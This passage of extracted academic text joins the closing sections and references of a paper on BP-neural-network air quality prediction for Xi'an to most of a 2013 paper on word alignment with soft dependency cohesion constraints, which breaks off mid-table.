cannot effectively use historical air pollutant data to provide quantitative reference for air pollution control and various control measures. The environmental protection department urgently needs to establish an air quality prediction system to realize the supervision and control of local air pollution. This paper studies a method to achieve air quality prediction based on BP neural network. By studying the change law of historical air pollutant project concentration data, it predicts the future air quality change trend for a period of time, and helps government environmental protection departments formulate air pollution control policies to provide quantification Indicators and references. This article first explains the research background and significance of this topic, and analyzes the necessity of establishing an air quality prediction system for air pollution control. Based on the analysis of the domestic research results of air quality prediction, combined with the regional characteristics and actual conditions of prefectural and municipal government departments, a framework model for air quality prediction based on statistical prediction is proposed. Then, an air quality prediction method model based on BP neural network is established, and the realization of the method includes three stages of air pollutant project concentration data collection, data processing, and prediction algorithm network model construction. This paper uses BP neural network to predict the air quality in Xi'an. Through the analysis of experimental results, BP neural network has a significant effect in dealing with such nonlinear problems, especially in the place where the AQI fluctuation is relatively large. The research is conducive to the prediction and prevention of air pollution problems. The government can also make appropriate measures and decisions based on the prediction results, such as closing schools or reducing outdoor sports, thereby reducing the damage caused by pollution. It can also provide new ways and methods for forecasting research in other fields. ACKNOWLEDGMENT The Research is supported by the new network and detection control national and local joint engineering laboratory. (Financing projects No. GSYSJ2016014). REFERENCES [1] Ren Wanhui, Su Zongzong, Zhao Hongde. Advances in the study of urban environmental air pollution forecasting [J]. Environmental Protection Science, 2010, 36(03):9-11. [2] Xu Dahai, Zhu Rong. Popularization and application of urban air pollution forecasting model [J]. Annual Report of CAMS, 1999(00):33. [3] Liu Shi, Wang Ning, Zhu Qiwen, Wang Xinguo, Hu Zhongming, Chen Changsheng. Research on the Statistical Model of Air Pollution Potential Forecast in Changchun City [J]. Meteorology, 2002(01):8-12. [4] Han Zhiwei, Du Shiyong, Lei Xiaoen, Ju Lixia, Wang Qingeng. Urban air pollution numerical prediction model system and its application [J]. Chinese Environmental Science, 2002(03): 11-15. [5] Tzu‐Yi Pai,Keisuke Hanaki,Ren‐Jie Chiou. Forecasting Hourly Roadside Particulate Matter in Taipei County of Taiwan Based on First‐Order and One‐Variable Grey Model [J]. John Wiley & Sons, Ltd, 2013, 41(8). [6] Wang Jian, Hu Xiaomin, Zheng Longxi, Liu Zhenshan. Research on air pollution forecasting method based on BP model [J]. Environmental Science Research, 2002(05):62-64. [7] Wang Qingeng, Xia Sijia, Wan Yixue, Jin Longshan. Problems and new ideas in current urban air pollution forecasting methods [J]. Environmental Science and Technology, 2009, 32(03):189-192. [8] A. Elkamel, S. Abdul-Wahab, W. Bouhamra, E. Alper. Measurement and prediction of ozone levels around a heavily industrialized area: a neural network approach [J]. Advances in Environmental Research, 2001, 5(1). [9] Jaakko Kukkonen, Leena Partanen, Ari Karppinen, Juhani Ruuskanen, Heikki Junninen, Mikko Kolehmainen, Harri Niska, Stephen Dorling, Tim Chatterton, Rob Foxall, Gavin Cawley. Extensive evaluation of neural network models for the prediction of NO 2 and PM 10 concentrations, compared with a deterministic modelling system and measurements in central Helsinki [J]. Atmospheric Environment, 2003, 37(32). [10] Hunt K.J., Sbarbaro D., Żbikowski R., Gawthrop P. J. Neural networks for control systemsâ€ ”A survey [J]. Pergamon, 1992, 28(6). work_tlps2yqrsbhxto74qmc2lfcdme ---- Large-scale Word Alignment Using Soft Dependency Cohesion Constraints Zhiguo Wang and Chengqing Zong National Laboratory of Pattern Recognition Institute of Automation, Chinese Academy of Sciences {zgwang, cqzong}@nlpr.ia.ac.cn Abstract Dependency cohesion refers to the observation that phrases dominated by disjoint dependency subtrees in the source language generally do not overlap in the target language. It has been verified to be a useful constraint for word alignment. However, previous work either treats this as a hard constraint or uses it as a feature in discriminative models, which is ineffective for large-scale tasks. In this paper, we take dependency cohesion as a soft constraint, and integrate it into a generative model for large-scale word alignment experiments. We also propose an approximate EM algorithm and a Gibbs sampling algorithm to estimate model parameters in an unsupervised manner. Experiments on large-scale Chinese-English translation tasks demonstrate that our model achieves improvements in both alignment quality and translation quality. 1 Introduction Word alignment is the task of identifying word correspondences between parallel sentence pairs. Word alignment has become a vital component of statistical machine translation (SMT) systems, since it is required by almost all state-of-the-art SMT systems for the purpose of extracting phrase tables or even syntactic transformation rules (Koehn et al., 2007; Galley et al., 2004). During the past two decades, generative word alignment models such as the IBM Models (Brown et al., 1993) and the HMM model (Vogel et al., 1996) have been widely used, primarily because they are trained on bilingual sentences in an unsupervised manner and the implementation is freely available in the GIZA++ toolkit (Och and Ney, 2003). However, the word alignment quality of generative models is still far from satisfactory for SMT systems. In recent years, discriminative alignment models incorporating linguistically motivated features have become increasingly popular (Moore, 2005; Taskar et al., 2005; Riesa and Marcu, 2010; Saers et al., 2010; Riesa et al., 2011). These models are usually trained with manually annotated parallel data. However, when moving to a new language pair, large amount of hand-aligned data are usually unavailable and expensive to create. A more practical way to improve large-scale word alignment quality is to introduce syntactic knowledge into a generative model and train the model in an unsupervised manner (Wu, 1997; Yamada and Knight, 2001; Lopez and Resnik, 2005; DeNero and Klein, 2007; Pauls et al., 2010). In this paper, we take dependency cohesion (Fox, 2002) into account, which assumes phrases dominated by disjoint dependency subtrees tend not to overlap after translation. Instead of treating dependency cohesion as a hard constraint (Lin and Cherry, 2003) or using it as a feature in discriminative models (Cherry and Lin, 2006b), we treat dependency cohesion as a distortion constraint, and integrate it into a modified HMM word alignment model to softly influence the probabilities of alignment candidates. We also propose an approximate EM algorithm and an explicit Gibbs sampling algorithm to train the model in an unsupervised manner. Experiments on a large-scale Chinese-English translation task demonstrate that our model achieves improvements in both word alignment quality and machine translation quality. The remainder of this paper is organized as follows: Section 2 introduces dependency cohesion 291 Transactions of the Association for Computational Linguistics, 1 (2013) 291–300. Action Editor: Chris Callison-Burch. Submitted 5/2013; Published 7/2013. c©2013 Association for Computational Linguistics. constraint for word alignment. Section 3 presents our generative model for word alignment using dependency cohesion constraint. Section 4 describes algorithms for parameter estimation. We discuss and analyze the experiments in Section 5. Section 6 gives the related work. Finally, we conclude this paper and mention future work in Section 7. 2 Dependency Cohesion Constraint for Word Alignment Given a source (foreign) sentence 𝒇1 𝐽 = 𝑓1, 𝑓2, … , 𝑓𝐽 and a target (English) sentence 𝒆1 𝐼 = 𝑒1, 𝑒2, … , 𝑒𝐼 , the alignment 𝓐 between 𝒇1 𝐽 and 𝒆1 𝐼 is defined as a subset of the Cartesian product of word positions: 𝓐 ∈ {(𝑗, 𝑖): 𝑗 = 1, … , 𝐽; 𝑖 = 1, … , 𝐼} When given the source side dependency tree 𝑇, we can project dependency subtrees in 𝑇 onto the target sentence through the alignment 𝓐 . Dependency cohesion assumes projection spans of disjoint subtrees tend not to overlap. Let 𝑇(𝑓𝑖 ) be the subtree of 𝑇 rooted at 𝑓𝑖, we define two kinds of projection span for the node 𝑓𝑖: subtree span and head span. The subtree span is the projection span of the total subtree 𝑇(𝑓𝑖 ), while the head span is the projection span of the node 𝑓𝑖 itself. Following Fox (2002) and Lin and Cherry (2003), we consider two types of dependency cohesion: head- modifier cohesion and modifier-modifier cohesion. Head-modifier cohesion is defined as the subtree span of a node does not overlap with the head span of its head (parent) node, while modifier-modifier cohesion is defined as subtree spans of two nodes under the same head node do not overlap each other. We call a situation where cohesion is not maintained crossing. Using the dependency tree in Figure 1 as an example, given the correct alignment “R”, the subtree span of “有/have” is [8, 14] , and the head span of its head node “之一/one of” is [3, 4]. They do not overlap each other, so the head-modifier cohesion is maintained. Similarly, the subtree span of “少数/few” is [6, 6], and it does not overlap the subtree span of “有/have”, so a modifier-modifier cohesion is maintained. However, when “R” is replaced with the incorrect alignment “W”, the subtree span of “有/have” becomes [3, 14], and it overlaps the head span of its head “之一/one of”, so a head-modifier crossing occurs. Meanwhile, the subtree spans of the two nodes “有/have” and “ 少数 /few” overlap each other, so a modifier- modifier crossing occurs. Fox (2002) showed that dependency cohesion is generally maintained between English and French. To test how well this assumption holds between Chinese and English, we measure the dependency cohesion between the two languages with a manually annotated bilingual Chinese-English data set of 502 sentence pairs 1 . We use the head- modifier cohesion percentage (HCP) and the modifier-modifier cohesion percentage (MCP) to measure the degree of cohesion in the corpus. HCP (or MCP) is used for measuring how many head- modifier (or modifier-modifier) pairs are actually cohesive. Table 1 lists the relative percentages in both Chinese-to-English (ch-en, using Chinese side dependency trees) and English-to-Chinese (en-ch, using English side dependency trees) directions. As we see from Table 1, dependency cohesion is 1 The data set is the development set used in Section 5. 澳洲是与北韩有的邦交少数国家。之一 Australia is one of the few countries that have diplomatic relations with North Korea . 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 Figure 1: A Chinese-English sentence pair including the word alignments and the Chinese side dependency tree. The Chinese and English words are listed horizontally and vertically, respectively. The black grids are gold-standard alignments. For the Chinese word “有/have”, we give two alignment positions, where “R” is the correct alignment and “W” is the incorrect alignment. 292 generally maintained between Chinese and English. So dependency cohesion would be helpful for word alignment between Chinese and English. However, there are still a number of crossings. If we restrict alignment space with a hard cohesion constraint, the correct alignments that result in crossings will be ruled out directly. In the next section, we describe an approach to integrating dependency cohesion constraint into a generative model to softly influence the probabilities of alignment candidates. We show that our new approach addresses the shortcomings of using dependency cohesion as a hard constraint. 3 A Generative Word Alignment Model with Dependency Cohesion Constraint The most influential generative word alignment models are the IBM Models 1-5 and the HMM model (Brown et al., 1993; Vogel et al., 1996; Och and Ney, 2003). These models can be classified into sequence-based models (IBM Models 1, 2 and HMM) and fertility-based models (IBM Models 3, 4 and 5). The sequence-based model is easier to implement, and recent experiments have shown that appropriately modified sequence-based model can produce comparable performance with fertility-based models (Lopez and Resnik, 2005; Liang et al., 2006; DeNero and Klein, 2007; Zhao and Gildea, 2010; Bansal et al., 2011). So we built a generative word alignment model with dependency cohesion constraint based on the sequence-based model. 3.1 The Sequence-based Alignment Model According to Brown et al. (1993) and Och and Ney (2003), the sequence-based model is built as a noisy channel model, where the source sentence 𝒇1 𝐽 and the alignment 𝒂1 𝐽 are generated conditioning on the target sentence 𝒆1 𝐼 . The model assumes each source word is assigned to exactly one target word, and defines an asymmetric alignment for the sentence pair as 𝒂1 𝐽 = 𝑎1, 𝑎2, … , 𝑎𝑗 , … , 𝑎𝐽 , where each 𝑎𝑗 ∈ [0, 𝐼] is an alignment from the source position j to the target position 𝑎𝑗 , 𝑎𝑗 = 0 means 𝑓𝑗 is not aligned with any target words. The sequence-based model divides alignment procedure into two stages (distortion and translation) and factors as: 𝑝(𝒇1 𝐽 , 𝒂1 𝐽 |𝒆1 𝐼 ) = ∏ 𝑝𝑑 (𝑎𝑗 |𝑎𝑗−1, 𝐼)𝑝𝑡 (𝑓𝑗 |𝑒𝑎𝑗 ) 𝐽 𝑗=1 (1) where 𝑝𝑑 is the distortion model and 𝑝𝑡 is the translation model. IBM Models 1, 2 and the HMM model all assume the same translation model 𝑝𝑡 (𝑓𝑗 |𝑒𝑎𝑗 ) . However, they use three different distortion models. IBM Model 1 assumes a uniform distortion probability 1/(I+1), IBM Model 2 assumes 𝑝𝑑 (𝑎𝑗 |𝑗) that depends on word position j and HMM model assumes 𝑝𝑑 (𝑎𝑗 |𝑎𝑗−1, 𝐼) that depends on the previous alignment 𝑎𝑗−1. Recently, tree distance models (Lopez and Resnik, 2005; DeNero and Klein, 2007) formulate the distortion model as 𝑝𝑑 (𝑎𝑗 |𝑎𝑗−1, 𝑇) , where the distance between 𝑎𝑗 and 𝑎𝑗−1 are calculated by walking through the phrase (or dependency) tree T. 3.2 Proposed Model To integrate dependency cohesion constraint into a generative model, we refine the sequence-based model in two ways with the help of the source side dependency tree 𝑇𝑓 . First, we design a new word alignment order. In the sequence-based model, source words are aligned from left to right by taking source sentence as a linear sequence. However, to apply dependency cohesion constraint, the subtree span of a head node is computed based on the alignments of its children, so children must be aligned before the head node. Riesa and Marcu (2010) propose a hierarchical search procedure to traverse all nodes in a phrase structure tree. Similarly, we define a bottom-up topological order (BUT-order) to traverse all words in the source side dependency tree 𝑇𝑓 . In the BUT-order, tree nodes are aligned bottom-up with 𝑇𝑓 as a backbone. For all children under the same head node, left children are aligned from right to left, and then right children are aligned from left to right. For example, the BUT-order for the following dependency tree is “C B E F D A H G”. A HGFEDCB ch-en en-ch HCP MCP HCP MCP 88.43 95.82 81.53 91.62 Table 1: Cohesion percentages (%) of a manually annotated data set between Chinese and English. 293 For the sake of clarity, we define a function to map all nodes in 𝑇𝑓 into their BUT-order, and notate it as BUT(𝑇𝑓 ) = 𝜋1, 𝜋2, … , 𝜋𝑗 , … , 𝜋𝐽 , where 𝜋𝑗 means the j-th node in BUT-order is the 𝜋𝑗 -th word in the original source sentence. We arrange alignment sequence 𝒂1 𝐽 according the BUT-order and notate it as 𝒂[1,𝐽] = 𝑎𝜋1 , … , 𝑎𝜋𝑗 , … , 𝑎𝜋𝐽 , where 𝑎𝜋𝑗 is the aligned position for a node 𝑓𝜋𝑗 . We also notate the sub-sequence 𝑎𝜋𝑖 , … , 𝑎𝜋𝑗 as 𝒂[𝑖,𝑗]. Second, we keep the same translation model as the sequence-based model and integrate the dependency cohesion constraints into the distortion model. The main idea is to influence the distortion procedure with the dependency cohesion constraints. Assume node 𝑓ℎ and node 𝑓𝑚 are a head-modifier pair in 𝑇𝑓 , where 𝑓ℎ is the head and 𝑓𝑚 is the modifier. The head-modifier cohesion relationship between them is notated as 𝒽ℎ,𝑚 ∈ {𝑐𝑜ℎ𝑒𝑠𝑖𝑜𝑛, 𝑐𝑟𝑜𝑠𝑠𝑖𝑛𝑔} . When the head-modifier cohesion is maintained 𝒽ℎ,𝑚 = 𝑐𝑜ℎ𝑒𝑠𝑖𝑜𝑛, otherwise 𝒽ℎ,𝑚 = 𝑐𝑟𝑜𝑠𝑠𝑖𝑛𝑔 . We represent the set of head- modifier cohesion relationships for all the head- modifier pairs in 𝑇𝑓 as: 𝑯 = {𝒽ℎ,𝑚 | ℎ ∈ [1, 𝐽], 𝑚 ∈ [1, 𝐽], ℎ ≠ 𝑚, 𝑓ℎ and 𝑓𝑚 are a head-modifier pair in 𝑇𝑓 } The set of head-modifier cohesion relationships for all the head-modifier pairs taking 𝑓ℎ as the head node can be represented as: 𝓱ℎ = {𝒽ℎ,𝑚 | 𝑚 ∈ [1, 𝐽], 𝑚 ≠ ℎ, 𝑓ℎ and 𝑓𝑚 are a head-modifier pair in 𝑇𝑓 } Obviously, 𝑯 = ⋃ 𝓱ℎ 𝐽 ℎ=0 . Similarly, we assume node 𝑓𝑘 and node 𝑓𝑙 are a modifier-modifier pair in 𝑇𝑓 . To avoid repetition, we assume 𝑓𝑘 is the node sitting at the position after 𝑓𝑙 in BUT-order and call 𝑓𝑘 as the higher- order node of the pair. The modifier-modifier cohesion relationship between them is notated as 𝓂𝑘,𝑙 ∈ {𝑐𝑜ℎ𝑒𝑠𝑖𝑜𝑛, 𝑐𝑟𝑜𝑠𝑠𝑖𝑛𝑔} . When the modifier- modifier cohesion is maintained 𝓂𝑘,𝑙 = 𝑐𝑜ℎ𝑒𝑠𝑖𝑜𝑛 , otherwise 𝓂𝑘,𝑙 = 𝑐𝑟𝑜𝑠𝑠𝑖𝑛𝑔. We represent the set of modifier-modifier cohesion relationships for all the modifier-modifier pairs in 𝑇𝑓 as: 𝑴 = {𝓂𝑘,𝑙 | 𝑘 ∈ [1, 𝐽], 𝑙 ∈ [1, 𝐽], 𝑘 ≠ 𝑙, 𝑓𝑘 and 𝑓𝑙 are a modifier-modifier pair in 𝑇𝑓 } The set of modifier-modifier cohesion relationships for all the modifier-modifier pairs taking 𝑓𝑘 as the higher-order node can be represented as: 𝓶𝑘 = {𝓂𝑘,𝑙 | 𝑙 ∈ [1, 𝐽], 𝑙 ≠ 𝑘, 𝑓𝑘 and 𝑓𝑙 are a modifier-modifier pair in 𝑇𝑓 } Obviously, 𝑴 = ⋃ 𝓶𝑘 𝐽 𝑘=0 . With the above notations, we formulate the distortion probability for a node 𝑓𝜋𝑗 as 𝑝𝑑 (𝑎𝜋𝑗 , 𝓱𝜋𝑗 , 𝓶𝜋𝑗 |𝒂[1,𝑗−1]). According to Eq. (1) and the two improvements, we formulated our model as: 𝑝(𝒇1 𝐽 , 𝒂[1,𝐽]|𝒆1 𝐼 , 𝑇𝑓 ) = 𝑝(𝒂[1,𝐽], 𝑯, 𝑴, 𝒇1 𝐽 , |𝒆1 𝐼 , 𝑇𝑓 ) ≈ ∏ 𝑝𝑑 (𝑎𝜋𝑗 , 𝓱𝜋𝑗 , 𝓶𝜋𝑗 |𝒂[1,𝑗−1]) 𝑝𝑡 (𝑓𝜋𝑗 |𝑒𝑎𝜋𝑗 )𝜋𝑗∈𝐵𝑈𝑇(𝑇𝑓) (2) Here, we use the approximation symbol, because the right hand side is not guaranteed to be normalized. In practice, we only compute ratios of these terms, so it is not actually a problem. Such model is called deficient (Brown et al., 1993), and many successful unsupervised models are deficient, e.g., IBM model 3 and IBM model 4. 3.3 Dependency Cohesive Distortion Model We assume the distortion procedure is influenced by three factors: words distance, head-modifier cohesion and modifier-modifier cohesion. Therefore, we further decompose the distortion model 𝑝𝑑 into three terms as follows: 𝑝𝑑 (𝑎𝜋𝑗 , 𝓱𝜋𝑗 , 𝓶𝜋𝑗 |𝒂[1,𝑗−1]) = 𝑝 (𝑎𝜋𝑗 |𝒂[1,𝑗−1]) 𝑝 (𝓱𝜋𝑗 |𝒂[1,𝑗]) 𝑝 (𝓶𝜋𝑗 |𝒂[1,𝑗], 𝓱𝜋𝑗 ) ≈ 𝑝𝑤𝑑 (𝑎𝜋𝑗 |𝑎𝜋𝑗−1 , 𝐼) 𝑝ℎ𝑐 (𝓱𝜋𝑗 |𝒂[1,𝑗]) 𝑝𝑚𝑐 (𝓶𝜋𝑗 |𝒂[1,𝑗]) (3) where 𝑝𝑤𝑑 is the words distance term, 𝑝ℎ𝑐 is the head-modifier cohesion term and 𝑝𝑚𝑐 is the modifier-modifier cohesion term. The word distance term 𝑝𝑤𝑑 has been verified to be very useful in the HMM alignment model. However, in our model, the word distance is calculated based on the previous node in BUT- order rather than the previous word in the original sentence. We follow the HMM word alignment model (Vogel et al., 1996) and parameterize 𝑝𝑤𝑑 in terms of the jump width: 𝑝𝑤𝑑 (𝑖|𝑖 ′, 𝐼) = 𝑐(𝑖−𝑖′ ) ∑ 𝑐(𝑖′′ −𝑖′)𝑖′′ (4) where 𝑐() is the count of jump width. 294 The head-modifier cohesion term 𝑝ℎ𝑐 is used to penalize the distortion probability according to relationships between the head node and its children (modifiers). Therefore, we define 𝑝ℎ𝑐 as the product of probabilities for all head-modifier pairs taking 𝑓𝜋𝑗 as head node: 𝑝ℎ𝑐 (𝓱𝜋𝑗 |𝒂[1,𝑗]) = ∏ 𝑝ℎ (𝒽𝜋𝑗,𝑐 |𝑓𝑐 , 𝑒𝑎𝜋𝑗 , 𝑒𝑎𝑐 )𝒽𝜋𝑗,𝑐∈𝓱𝜋𝑗 (5) where 𝒽𝜋𝑗,𝑐 ∈ {𝑐𝑜ℎ𝑒𝑠𝑖𝑜𝑛, 𝑐𝑟𝑜𝑠𝑠𝑖𝑛𝑔} is the head- modifier cohesion relationship between 𝑓𝜋𝑗 and one of its child 𝑓𝑐 , 𝑝ℎ is the corresponding probability, 𝑒𝑎𝜋𝑗 and 𝑒𝑎𝑐 are the aligned words for 𝑓𝜋𝑗 and 𝑓𝑐. Similarly, the modifier-modifier cohesion term 𝑝𝑚𝑐 is used to penalize the distortion probability according to relationships between 𝑓𝜋𝑗 and its siblings. Therefore, we define 𝑝𝑚𝑐 as the product of probabilities for all the modifier-modifier pairs taking 𝑓𝜋𝑗 as the higher-order node: 𝑝𝑚𝑐 (𝓶𝜋𝑗 |𝒂[1,𝑗] ) = ∏ 𝑝𝑚 (𝓂𝜋𝑗,𝑠 |𝑓𝑠 , 𝑒𝑎𝜋𝑗 , 𝑒𝑎𝑠 )𝓂𝜋𝑗,𝑠∈𝓶𝜋𝑗 (6) where 𝓂𝜋𝑗,𝑠 ∈ {𝑐𝑜ℎ𝑒𝑠𝑖𝑜𝑛, 𝑐𝑟𝑜𝑠𝑠𝑖𝑛𝑔} is the modifier- modifier cohesion relationship between 𝑓𝜋𝑗 and one of its sibling 𝑓𝑠 , 𝑝𝑚 is the corresponding probability, 𝑒𝑎𝜋𝑗 and 𝑒𝑎𝑠 are the aligned words for 𝑓𝜋𝑗 and 𝑓𝑠. Both 𝑝ℎ and 𝑝𝑚 in Eq. (5) and Eq. (6) are conditioned on three words, which would make them very sparse. To cope with this problem, we use the word clustering toolkit, mkcls (Och et al., 1999), to cluster all words into 50 classes, and replace the three words with their classes. 4 Parameter Estimation To align sentence pairs with the model in Eq. (2), we have to estimate some parameters: 𝑝𝑡, 𝑝𝑤𝑑, 𝑝ℎ and 𝑝𝑚 . The traditional approach for sequence- based models uses Expectation Maximization (EM) algorithm to estimate parameters. However, in our model, it is hard to find an efficient way to sum over all the possible alignments, which is required in the E-step of EM algorithm. Therefore, we propose an approximate EM algorithm and a Gibbs sampling algorithm for parameter estimation. 4.1 Approximate EM Algorithm The approximate EM algorithm is similar to the training algorithm for fertility-based alignment models (Och and Ney, 2003). The main idea is to enumerate only a small subset of good alignments in the E-step, then collect expectation counts and estimate parameters among the small subset in M- step. Following with Och and Ney (2003), we employ neighbor alignments of the Viterbi alignment as the small subset. Neighbor alignments are obtained by performing one swap or move operation over the Viterbi alignment. Obtaining the Viterbi alignment itself is not so easy for our model. Therefore, we take the Viterbi alignment of the sequence-based model (HMM model) as the starting point, and iterate the hill- climbing algorithm (Brown et al., 1993) many times to get the best alignment greedily. In each iteration, we find the best alignment with Eq. (2) among neighbor alignments of the initial point, and then make the best alignment as the initial point for the next iteration. The algorithm iterates until no update could be made. 4.2 Gibbs Sampling Algorithm Gibbs sampling is another effective algorithm for unsupervised learning problems. As is described in the literatures (Johnson et al., 2007; Gao and Johnson, 2008), there are two types of Gibbs samplers: explicit and collapsed. An explicit sampler represents and samples the model parameters in addition to the word alignments, while in a collapsed sampler the parameters are integrated out and only alignments are sampled. Mermer and Saraçlar (2011) proposed a collapsed sampler for IBM Model 1. However, their sampler updates parameters constantly and thus cannot run efficiently on large-scale tasks. Instead, we take advantage of explicit Gibbs sampling to make a highly parallelizable sampler. Our Gibbs sampler is similar to the MCMC algorithm in Zhao and Gildea (2010), but we assume Dirichlet priors when sampling model parameters and take a different sampling approach based on the source side dependency tree. Our sampler performs a sequence of consecutive iterations. Each iteration consists of two sampling steps. The first step samples the aligned position for each dependency node according to the BUT- order. Concretely, when sampling the aligned 295 position 𝑎𝜋𝑗 (𝑡+1) for node 𝑓𝜋𝑗 on iteration 𝑡+1, the aligned positions for 𝒂[1,𝑗−1] are fixed on the new sampling results 𝒂[1,𝑗−1] (𝑡+1) on iteration 𝑡 +1, and the aligned positions for 𝒂[𝑗+1,𝐽] are fixed on the old sampling results 𝒂[𝑗+1,𝐽] (𝑡) on iteration 𝑡 . Therefore, we sample the aligned position 𝑎𝜋𝑗 (𝑡+1) as follows: 𝑎𝜋𝑗 (𝑡+1) ~ 𝑝 (𝑎𝜋𝑗 |𝒂[1,𝑗−1] (𝑡+1) , 𝒂[𝑗+1,𝐽] (𝑡) , 𝑓1 𝐽 , 𝑒1 𝐼 ) = 𝑝 (𝒇1 𝐽 , �̂�𝑎𝜋𝑗 |𝒆1 𝐼 ) ∑ 𝑝 (𝒇1 𝐽 , �̂�𝑎𝜋𝑗 |𝒆1 𝐼 )𝑎𝜋𝑗 ∈{0,1,…,𝐼} (7) where �̂�𝑎𝜋𝑗 = 𝒂 [1,𝑗−1] (𝑡+1) ∪ 𝑎𝜋𝑗 ∪ 𝒂[𝑗+1,𝐽] (𝑡) , the numerator is the probability of aligning 𝑓𝜋𝑗 with 𝑒𝑎𝜋𝑗 (the alignments for other nodes are fixed at 𝒂[1,𝑗−1] (𝑡+1) and 𝒂[𝑗+1,𝐽] (𝑡) ) calculated with Eq. (2), and the denominator is the summation of the probabilities of aligning 𝑓𝜋𝑗 with each target word. The second step of our sampler calculates parameters 𝑝𝑡, 𝑝𝑤𝑑, 𝑝ℎ and 𝑝𝑚 using their counts, where all these counts can be easily collected during the first sampling step. Because all these parameters follow multinomial distributions, we consider Dirichlet priors for them, which would greatly simplify the inference procedure. In the first sampling step, all the sentence pairs are processed independently. So we can make this step parallel and process all the sentence pairs efficiently with multi-threads. When using the Gibbs sampler for decoding, we just ignore the second sampling step and iterate the first sampling step many times. 5 Experiments We performed a series of experiments to evaluate our model. All the experiments are conducted on the Chinese-English language pair. We employ two training sets: FBIS and LARGE. The size and source corpus of these training sets are listed in Table 2. We will use the smaller training set FBIS to evaluate the characters of our model and use the LARGE training set to evaluate whether our model is adaptable for large-scale task. For word alignment quality evaluation, we take the hand- aligned data sets from SSMT20072, which contains 2 http://nlp.ict.ac.cn/guidelines/guidelines-2007- SSMT(English).doc 505 sentence pairs in the testing set and 502 sentence pairs in the development set. Following Och and Ney (2003), we evaluate word alignment quality with the alignment error rate (AER), where lower AER is better. Because our model takes dependency trees as input, we parse both sides of the two training sets, the development set and the testing set with Berkeley parser (Petrov et al., 2006), and then convert the generated phrase trees into dependency trees according to Wang and Zong (2010; 2011). Our model is an asymmetric model, so we perform word alignment in both forward (ChineseEnglish) and reverse (EnglishChinese) directions. 5.1 Effectiveness of Cohesion Constraints In Eq. (3), the distortion probability 𝑝𝑑 is decomposed into three terms: 𝑝𝑤𝑑 , 𝑝ℎ𝑐 and 𝑝𝑚𝑐 . To study whether cohesion constraints are effective for word alignment, we construct four sub-models as follows: (1) wd: 𝑝𝑑 = 𝑝𝑤𝑑; (2) wd-hc: 𝑝𝑑 = 𝑝𝑤𝑑 ∙ 𝑝ℎ𝑐; (3) wd-mc: 𝑝𝑑 = 𝑝𝑤𝑑 ∙ 𝑝𝑚𝑐; (4) wd-hc-mc: 𝑝𝑑 = 𝑝𝑤𝑑 ∙ 𝑝ℎ𝑐 ∙ 𝑝𝑚𝑐. We train these four models with the approximate EM and the Gibbs sampling algorithms on the FBIS training set. For approximate EM algorithm, we first train a HMM model (with 5 iterations of IBM model 1 and 5 iterations of HMM model), then train these four sub-models with 10 iterations of the approximate EM algorithm. For Gibbs sampling, we choose symmetric Dirichlet priors identically with all hyper-parameters equals 0.0001 to obtain a sparse Dirichlet prior. Then, we make the alignments produced by the HMM model as the initial points, and train these sub-models with 20 iterations of the Gibbs sampling. AERs on the development set are listed in Table 3. We can easily find: 1) when employing the head-modifier cohesion constraint, the wd-hc model yields better AERs than the wd model; 2) Train Set Source Corpus # Words FBIS FBIS newswire data Ch: 7.1M En: 9.1M LARGE LDC2000T50, LDC2003E14, LDC2003E07, LDC2004T07, LDC2005T06, LDC2002L27, LDC2005T10, LDC2005T34 Ch: 27.6M En: 31.8M Table 2: The size and the source corpus of the two training sets. 296 when employing the modifier-modifier cohesion constraint, the wd-mc model also yields better AERs than the wd model; and 3) when employing both head-modifier cohesion constraint and modifier-modifier cohesion constraint together, the wd-hc-mc model yields the best AERs among the four sub-models. So both head-modifier cohesion constraint and modifier-modifier cohesion constraint are helpful for word alignment. Table 3 also shows that the approximate EM algorithm yields better AERs in the forward direction than reverse direction, while the Gibbs sampling algorithm yields close AERs in both directions. 5.2 Comparison with State-of-the-Art Models To show the effectiveness of our model, we compare our model with some of the state-of-the- art models. All the systems are listed as follows: 1) IBM4: The fertility-based model (IBM model 4) which is implemented in GIZA++ toolkit. The training scheme is 5 iterations of IBM model 1, 5 iterations of the HMM model and 10 iterations of IBM model 4. 2) IBM4-L0: A modification to the GIZA++ toolkit which extends IBM models with ℓ0 - norm (Vaswani et al., 2012). The training scheme is the same as IBM4. 3) IBM4-Prior: A modification to the GIZA++ toolkit which extends the translation model of IBM models with Dirichlet priors (Riley and Gildea, 2012). The training scheme is the same as IBM4. 4) Agree-HMM: The HMM alignment model by jointly training the forward and reverse models (Liang et al., 2006), which is implemented in the BerkeleyAligner. The training scheme is 5 iterations of jointly training IBM model 1 and 5 iterations of jointly training HMM model. 5) Tree-Distance: The tree distance alignment model proposed in DeNero and Klein (2007), which is implemented in the BerkeleyAligner. The training scheme is 5 iterations of jointly training IBM model 1 and 5 iterations of jointly training the tree distance model. 6) Hard-Cohesion: The implemented “Cohesion Checking Algorithm” (Lin and Cherry, 2003) which takes dependency cohesion as a hard constraint during beam search word alignment decoding. We use the model trained by the Agree-HMM system to estimate alignment candidates. We also build two systems for our soft dependency cohesion model: 7) Soft-Cohesion-EM: the wd-hc-mc sub-model trained with the approximate EM algorithm as described in sub-section 5.1. 8) Soft-Cohesion-Gibbs: the wd-hc-mc sub-model trained with the Gibbs sampling algorithm as described in sub-section 5.1. We train all these systems on the FBIS training set, and test them on the testing set. We also combine the forward and reverse alignments with the grow-diag-final-and (GDFA) heuristic (Koehn et al., 2007). All AERs are listed in Table 4. We find our soft cohesion systems produce better AERs than the Hard-Cohesion system as well as the other systems. Table 5 gives the head-modifier cohesion percentage (HCP) and the modifier- modifier cohesion percentage (MCP) of each system. We find HCPs and MCPs of our soft cohesion systems are much closer to the gold- standard alignments. To evaluate whether our model is adaptable for large-scale task, we retrained these systems using the LARGE training set. AERs on the testing set are listed in Table3 6. Compared with Table 4, we 3 Tree-Distance system requires too much memory to run on our server when using the LARGE data set, so we can’t get the result. forward reverse GDFA IBM4 42.90 42.81 44.32 IBM4-L0 42.59 41.04 43.19 IBM4-Prior 41.94 40.46 42.44 Agree-HMM 38.03 37.91 41.01 Tree-Distance 34.21 37.22 38.42 Hard-Cohesion 37.32 38.92 38.92 Soft-Cohesion-EM 33.65 34.74 35.85 Soft-Cohesion-Gibbs 34.45 33.72 34.46 Table 4: AERs on the testing set (trained on the FBIS data set). EM Gibbs forward reverse forward reverse wd 26.12 28.66 27.09 26.40 wd-hc 24.67 25.86 26.24 24.39 wd-mc 24.49 26.53 25.51 25.40 wd-hc-mc 23.63 25.17 24.65 24.33 Table 3: AERs on the development set (trained 